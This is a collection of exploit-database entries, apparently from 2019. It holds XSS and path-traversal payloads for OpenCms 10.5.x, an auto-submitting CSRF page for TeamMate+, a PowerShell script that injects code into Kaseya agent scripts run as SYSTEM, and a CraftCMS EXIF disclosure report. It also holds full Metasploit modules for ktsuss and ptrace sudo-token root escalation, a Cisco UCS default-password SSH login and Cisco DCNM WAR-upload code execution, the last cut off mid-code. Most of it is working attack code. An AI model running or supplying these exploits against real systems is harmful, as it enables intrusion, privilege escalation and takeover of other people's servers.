# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13236 1. In Site Management > New site (Stored XSS): - Affected resource title.0: POC: ``` POST /system/workplace/admin/sites/new.jsp HTTP/1.1 Host: example.com title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se ``` 2. In Treeview (Reflected XSS): - Affected resource type: POC: ``` http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type= </script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite= ``` 3. In Workspace tools > Login message (Stored XSS): - Affected resource message.0: POC: ``` POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1 Host: example.com enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename= ``` 4. In Index sources > View index sources > New index source (Stored XSS): - Affected resource name.0: POC: ``` POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1 Host: example.com name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename= ``` 5. In Index sources > View field configuration > New field configuration (Stored XSS): - Affected resource name.0: POC: ``` POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1 Host: example.com name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename= ``` 6. In Account Management > Impor/Export user data (Reflected XSS): - Affected resource oufqn: POC: ``` POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1 Host: example.com groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename= ``` 7. In Account Management > Group Management > New Group (Stored XSS): - Affected resources name.0 and description.0: POC:``` POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27 ``` 8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS): - Affected resources parentOuDesc.0 and resources.0: POC:``` POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D ``` 9. In Link Validator > External Link Validator > Validate External Links (Reflected XSS): - Affected resources reporttype, reportcontinuekey and title: POC:``` POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1 Host: example.com dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK ``` 10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS): - Affected resources destinationDir.0, imageGallery.0, linkGallery.0, downloadGallery.0: POC:``` POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1 Host: example.com ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="inputDir.0" . ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="destinationDir.0" /whbo0"><script>alert(1)</script>nrbhd ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="imageGallery.0" ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="downloadGallery.0" ------WebKitFormBoundaryLyJOmAtrd8ArxNqf Content-Disposition: form-data; name="linkGallery.0" [...] ``` 11. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS): - Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0: POC: ``` POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1 Host: example.com ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="inputDir.0" gato ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="destinationDir.0" testszfgw"><script>alert(1)</script>vqln7 ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="imageGallery.0" test ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="downloadGallery.0" test ------WebKitFormBoundary6fy3ENawtXT0qmgB Content-Disposition: form-data; name="linkGallery.0" test [...] ``` Extended POCs: https://aetsu.github.io/OpenCms

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13237 For the tests, I used the payloads: ``` …%2f…%2fWEB-INF%2flogs%2fopencms.log …%2f…%2fWEB-INF%2fweb.xml ``` 1. Affected resource closelink: POC: ``` POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1 Host: example.com enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 2. Affected resource closelink: POC: ``` POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp HTTP/1.1 Host: example.com reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok ``` 3. Affected resource closelink: POC: ``` POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1 Host: example.com name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 4. Affected resource closelink: POC: ``` POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1 Host: example.com versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename= ``` 5. Affected resource closelink: POC: ``` POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1 Host: example.com reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK ``` Extended POCs: https://aetsu.github.io/OpenCms

Hello, Please find the below vulnerability details, --------------------------------------------------------------------------------------------------------------------------------- # Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability # Date: 02/09/2019 # Exploit Author: Bhadresh Patel # Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0) # CVE : CVE-2019-10253 This is an article with PoC exploit code for for Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability --------------------------------------------------------------------------------------------------------------------------------- Title: ==== Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability CVE: ==== CVE-2019-10253 Date: ==== 02/09/2019 (dd/mm/yyyy) Vendor: ====== Wolters Kluwer is a global leader in professional information, software solutions, and services for the health, tax & accounting, finance, risk & compliance, and legal sectors. We help our customers make critical decisions every day by providing expert solutions that combine deep domain knowledge with specialized technology and services. Vendor link: http://www.teammatesolutions.com/about-us.aspx Vulnerable Product: ============== TeamMate+ TeamMate Global Audit Solutions, part of the Tax and Accounting Division of Wolters Kluwer, helps professionals in all industries at organizations around the world manage audit and compliance risks and business issues by providing targeted, configurable, and efficient software solutions. Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate Analytics. Together, this ecosystem of solutions provides organizations with the combined assurance they need to manage all aspects of risk identification and assessment, electronic working paper creation and management, controls framework management, and data analysis. Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an attacker to upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files by enticing authenticated user to visit attacker page. Report-Timeline: ================ 19/03/2019: Vendor notified 19/03/2019: Vendor responded requesting further information 20/03/2019: Further technical information with PoC was shared with vendor 01/07/2019: Vendor fixed the issue in version 3.2 Affected Software Version: ========================== <= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0) Exploitation-Technique: ======================= Remote Severity Rating (CVSS): ======================= 4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) CVE ID: ======= CVE-2019-10253 Details: ======= A Cross-Site Request Forgery (CSRF) vulnerability is discovered in TeamMate+ which allows a remote attacker to modify application data (upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files) without victim's knowledge by enticing authenticated user to visit attacker page/URL. The specific flaw exists within the handling of request to “DomainObjectDocumentUpload.ashx” application. An application failed to validate CSRF token before handling the POST request. Vulnerable module/page/application: /TeamMate/Upload/DomainObjectDocumentUpload.ashx PoC Exploit code: ---------------------------------------------------------------------------- <html> <body onload="submitRequest()"> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx", true); xhr.setRequestHeader("Accept", "text/html, */*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"fileObjectId\"\r\n" + "\r\n" + "0\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"parentId\"\r\n" + "\r\n" + "1373\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"AssessmentId\"\r\n" + "\r\n" + "34\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"ProjectId\"\r\n" + "\r\n" + "1106\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" + "\r\n" + "50\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" + "\r\n" + "90\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" + "Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" + "Content-Type: application/x-msdownload\r\n" + "\r\n" + "MZP\r\n" + "------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> </body> </html> ---------------------------------------------------------------------------- Credits: ======= Bhadresh Patel

# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation # Google Dork: N/A # Date: 2-09-2019 # Exploit Author: NF # Vendor Homepage: https://www.kaseya.com/products/vsa/ # Software Link: https://www.kaseya.com/products/vsa/ # Version: <= 9.5 agentmon.exe # Tested on: Windows 10 # CVE : N/A ##Vulnerability## This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian. A a fix was put in place for the original CVE, however it was specific to binaries and not scripts. The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process. The Kaseya agent (agentmon.exe) runs as SYSTEM by default. The agent also has a default working folder @ C:\kworking\ It will pull scripts and binaries to this folder and execute them from disk from the controlling web application. By default the *Authenticated Users* group has all rights to this folder. Scripts are written to disk however they are not checked for integrity prior to execution. So a folder can be monitored for script files being dropped and then append malicious code prior to execution. ##Proof of concept## This PowerShell script will monitor the default working directory. When a ps1 script drops from a scheduled task or run from the VSA web application it will then append the command "Write-Host 'injected content'" which will run as SYSTEM. Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script. Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts <--script start--> $folder = 'c:\kworking' $filter = '*.ps1' $filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false;NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'} Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action { $path = $Event.SourceEventArgs.FullPath "`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8 Unregister-Event FileCreated } <--script end--> ##Timeline## 16-06-2019 :: Issue found 18-06-2019 :: security@ emailed requesting steps to disclose 30-06-2019 :: CERT contacted due to non response of vendor from official email address 31-06-2019 :: CERT still unable to contact vendor 07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor 20-08-2019 :: Vendor confirms receipt of details 27-08-2019 :: Email sent indicating intention to disclose due to lack of response 02-09-2019 :: No response through CERT. Findings published

# Exploit Title : CraftCms Users information disclosure From uploaded File # Author [Discovered By] : Mohammed Abdul Raheem # Author's [Company Name] : TrekShield IT Solution # Author [Exploit-db] : https://www.exploit-db.com/?author=9783 # Found Vulnerability On : 20-07-2019 # Vendor Homepage:https://craftcms.com/ # Software Information Link: https://github.com/craftcms/demo # Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : Sensitive information disclosure # CVE : CVE-2019-14280 #################################################################### # Description about Software : *************************** Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. #################################################################### # Vulnerability Description : ***************************** When a user uploads an image in CraftCMS, the uploaded image's EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of CraftCMS's users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc. # Impact : *********** This vulnerability is CRITICAL and impacts all the craft's customer base. This vulnerability violates the privacy of a User and shares sensitive information of the user who uploads an image on CraftCMS. # Steps To Validate : ********************* 1. Login to CraftCMS account. 2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets 3. Upload an image which has EXIF Geolocation Data in it. 4. Once the image is uploaded by CraftCMS and hosted on the server, download the image file and check the File Properties. You can also use a tool like to view user's information: https://www.pic2map.com # ATTACHED POC : **************** https://youtu.be/s-fTdu8R3bU # More Information Can be find here : ************************************* https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23 ################################################################### # Discovered By Mohammed Abdul Raheem from TrekShield.com

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ktsuss suid Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior. The ktsuss executable is setuid root and does not drop privileges prior to executing user specified commands, resulting in command execution with root privileges. This module has been tested successfully on: ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'John Lightsey', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2011-08-13', 'References' => [ ['CVE', '2011-2921'], ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'], ['URL', 'https://security.gentoo.org/glsa/201201-15'], ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh'] ], 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'DefaultOptions' => { 'AppendExit' => true, 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependSetreuid' => true, 'PrependSetuid' => true, 'PrependFork' => true }, 'DefaultTarget' => 0)) register_options [ OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def ktsuss_path datastore['KTSUSS_PATH'] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def check unless setuid? ktsuss_path vprint_error "#{ktsuss_path} is not setuid" return CheckCode::Safe end vprint_good "#{ktsuss_path} is setuid" id = cmd_exec 'whoami' res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s vprint_status res unless res.include? 'uid=0' return CheckCode::Safe end CheckCode::Vulnerable end def exploit unless check == CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 10..15}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe print_status 'Executing payload ...' id = cmd_exec 'whoami' res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo " vprint_line res end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Cisco UCS Director default scpuser password", 'Description' => %q{ This module abuses a known default password on Cisco UCS Director. The 'scpuser' has the password of 'scpuser', and allows an attacker to login to the virtual appliance via SSH. This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. Note that Cisco also mentions in their advisory that their IMC Supervisor and UCS Director Express are also affected by these vulnerabilities, but this module was not tested with those products. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2019-1935' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Cisco UCS Director < 6.7.2.0', {} ], ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 21 2019' )) register_options( [ Opt::RPORT(22), OptString.new('USERNAME', [true, "Username to login with", 'scpuser']), OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']), ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user, pass) factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], :port => rport, :use_agent => false, :config => false, :password => pass, :proxy => factory, :non_interactive => true, :verify_host_key => :never } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end return nil end def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...") conn = do_login(user, pass) if conn print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") handler(conn.lsock) end end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Kernel include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ptrace Sudo Token Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges by blindly injecting into the session user's running shell processes and executing commands by calling `system()`, in the hope that the process has valid cached sudo tokens with root privileges. The system must have gdb installed and permit ptrace. This module has been tested successfully on: Debian 9.8 (x64); and CentOS 7.4.1708 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'chaignc', # sudo_inject 'bcoles' # Metasploit ], 'DisclosureDate' => '2019-03-24', 'References' => [ ['EDB', '46989'], ['URL', 'https://github.com/nongiach/sudo_inject'], ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'], ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'], ['URL', 'https://lwn.net/Articles/393012/'], ['URL', 'https://lwn.net/Articles/492667/'], ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'], ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html'] ], 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'DefaultOptions' => { 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true, 'WfsDelay' => 30 }, 'DefaultTarget' => 0)) register_options [ OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def timeout datastore['TIMEOUT'] end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def check if yama_enabled? vprint_error 'YAMA ptrace scope is restrictive' return CheckCode::Safe end vprint_good 'YAMA ptrace scope is not restrictive' if command_exists? '/usr/sbin/getsebool' if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true' vprint_error 'SELinux deny_ptrace is enabled' return CheckCode::Safe end vprint_good 'SELinux deny_ptrace is disabled' end unless command_exists? 'sudo' vprint_error 'sudo is not installed' return CheckCode::Safe end vprint_good 'sudo is installed' unless command_exists? 'gdb' vprint_error 'gdb is not installed' return CheckCode::Safe end vprint_good 'gdb is installed' CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end if nosuid? base_dir fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid" end # Find running shell processes shells = %w[ash ksh csh dash bash zsh tcsh fish sh] system_shells = read_file('/etc/shells').to_s.each_line.map {|line| line.strip }.reject {|line| line.starts_with?('#') }.each {|line| shells << line.split('/').last } shells = shells.uniq.reject {|shell| shell.blank?} print_status 'Searching for shell processes ...' pids = [] if command_exists? 'pgrep' cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid| pids << pid.strip end else shells.each do |s| pidof(s).each {|p| pids << p.strip} end end if pids.empty? fail_with Failure::Unknown, 'Found no running shell processes' end print_status "Found #{pids.uniq.length} running shell processes" vprint_status pids.join(', ') # Upload payload @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}" upload @payload_path, generate_payload_exe # Blindly call system() in each shell process pids.each do |pid| print_status "Injecting into process #{pid} ..." cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1" sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1" res = cmd_exec sudo_inject, nil, timeout vprint_line res unless res.blank? next unless setuid? @payload_path print_good "#{@payload_path} setuid root successfully" print_status 'Executing payload...' res = cmd_exec "#{@payload_path} & echo " vprint_line res return end fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.' end def on_new_session(session) if session.type.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.fs.file.rm @payload_path else session.shell_command_token "rm -f '#{@payload_path}'" end ensure super end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution', 'Description' => %q{ DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root. This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct directory for the WAR file upload. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why). }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-1619' ], # auth bypass [ 'CVE', '2019-1620' ], # file upload [ 'CVE', '2019-1622' ], # log download [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', {} ], [ 'Cisco DCNM 11.1(1)', {} ], [ 'Cisco DCNM 11.0(1)', {} ], [ 'Cisco DCNM 10.4(2)', {} ] ], 'Privileged' => true, 